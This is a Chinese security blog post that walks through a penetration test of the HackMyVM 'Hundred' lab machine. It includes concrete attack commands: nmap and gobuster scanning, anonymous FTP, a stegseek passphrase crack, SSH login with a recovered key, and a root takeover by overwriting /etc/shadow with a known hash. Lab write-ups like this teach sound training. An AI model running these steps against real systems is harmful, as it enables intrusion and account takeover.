记一次hackmyvm靶场的渗透测试 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

记一次hackmyvm靶场的渗透测试

2022-02-10 08:27:57

所属地黑龙江省

这个靶场是群友推荐的一个综合靶场，是一个对渗透新手很友好的靶场。而且，该靶场包含了渗透测试的信息收集，漏洞利用和权限提升的全过程，对新手理解渗透测试的流程有很好的帮助。

靶场地址：https://hackmyvm.eu/machines/machine.php?vm=Hundred

靶场基本情况：

KALI靶机：192.168.1.3/24

主机：192.168.1.146/24

目标：普通用户flag和管理员flag

信息收集阶段：

nmap -sn 192.168.1.0/2 1644452095_620458ffc725ee8532fe9.png!small

sudo nmap -v -T4 -p- -A -oN nmap.log 192.168.1.146

nmap -A 192.168.1.146 1644452102_6204590633e136d346c60.png!small

这里我们看到开启了21端口，22端口和80端口：

漏洞利用阶段：

我们连接下21端口：

用户名和密码都是ftp，然后查看当前目录文件，可见密钥文件和users.txt文件。

其实用户名是ftp，密码是什么，都可以登录！

1644452214_62045976d2f89a44f752f.png!small?1644452223832

这里采用mget，将所有文件下载到本地！这里采用mget可以一次性下载多个文件！

1644452227_620459833c56b352615ac.png!small?1644452235887

id_rsa文件：私钥是个兔子！

1644452240_6204599089a8d1f134f64.png!small?1644452249083

公钥文件，看着挺正常！

1644452248_62045998a64f51c48cf7c.png!small?1644452257382

接下来，查看下id_rsa.pem文件！这个像是私钥文件！

1644452258_620459a24e2f0420405a2.png!small?1644452266916

然后，查看用户名文件！最后那个感谢的像是真正的用户名！

1644452269_620459ad2d0f0775bf920.png!small?1644452281839

可以这里我们试着用着这个私钥文件通过SSH登录下hmv这个文件！

嘿嘿嘿，不行！

1644452277_620459b528d91e0ca1a1a.png!small?1644452285796

这条路暂时不同，接着咱们看下那个开放的80端口，直接访问下看看！！！

一个方块？

1644452285_620459bd728b866c1d0ae.png!small?1644452294141

1644452289_620459c14b726bc42797f.png!small?1644452297804

貌似出题人，打靶场打的魔怔了！

查看源代码，发现了端倪！

1644452296_620459c8759dff1c0e23d.png!small?1644452304983

上面是个文件，下面是个目录！？先下载下来看看

wget http://192.168.1.146/h4ckb1tu5.enc

这个页面作为一个整体告诉我们可以通过这个key值获取一个目录。而且，我们也可以从logo图片获取一些信息通过图片隐写术。回到这个key值，我们可以通过RSA私钥和OpenSSL rsautl解码信息。通过解码信息获取一个文件。

接下来，我们用私钥文件和下载下来不知道啥玩意的文件生成目录！

1644452307_620459d39ad669a58b233.png!small?1644452316150

访问下看看！192.168.1.146/，方向没错！！！

1644452319_620459dfaf49922a794c2.png!small?1644452328214

查看源代码？啥也没有？

1644452326_620459e669f70e8a136af.png!small?1644452334988

网站的目录扫描有要点，一层一层的扫描！！！

来个超级字典！

https://github.com/danielmiessler/SecLists/releases/tag/2022.1

扫一波目录：

gobuster dir -w /root/Web-Content/common.txt -u http://192.168.1.146/softyhackb4el7dshelldredd/

1644452341_620459f5ccf11adfeb70d.png!small?1644452350436

然后，把这个私钥下载下来:

wget http://192.168.1.146/softyhackb4el7dshelldredd/id_rsa

1644452350_620459fe73c8b59bb9cbb.png!small?1644452358985

这次登录试下！两个问题：

too open需要将私钥的权限改为600
这个id_rsa需要密码

1644452358_62045a0648d2a3a619b74.png!small?1644452366904

接下来，需要搞定这个rsa的密码！！！！

我们先把这个logo图片下下来！！！

wget http://192.168.1.146/logo.jpg

这里我们需要安装一个图片隐写工具：

https://github.com/RickdeJager/stegseek/releases/tag/v0.6

下载完：安装下：

dpkg -i stegseek_0.6-1.deb

安装过程中可能缺少部分组件：

apt --fix-broken install

安装完毕：采用先前的user.txt,对logo图片进行解密！

stegseek logo.jpg users.txt -xf output

1644452374_62045a16e5d2cfcf67972.png!small?1644452383516

这就是私钥的密码了！！

d4t4s3c#1

ssh -i id_rsa hmv@192.168.1.146

1644452388_62045a24935d18187952a.png!small?1644452405285

终于进来了！！！！

权限提升阶段：

接下来，root权限提升：

在这台VM上root的权限提升很容易。这个/etc/shadow文件对任何人可写。因为我们可以通过修改这个文件来获取root的密码。

以下链接介绍了/etc/shadow文件的组成：

https://www.cyberciti.biz/faq/understanding-etcshadow-file/ 1644452411_62045a3bbde1bb78f1c05.png!small?1644452420392

因为我们不需要读/etc/shadow这个文件，我们只需要复写它。

因此，我们把密码修改为root，如下：

1 生成密码root的加密值

openssl passwd # enter new password "root"

2 将root的加密值导入到/etc/shadow的root用户格式中

echo root:qdbEWfKM1ov2g:18844:0:99999:7::: > /etc/shadow

3 切换为root，输入密码root

su -l 1644452423_62045a478d7a0ad6921c0.png!small?1644452432120

完事了，这个难度是easy，其实也不简单。

# 渗透测试 # 内网渗透 # 靶场实战

本文为独立观点，未经允许不得转载，授权请联系FreeBuf客服小蜜蜂，微信：freebee2022

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多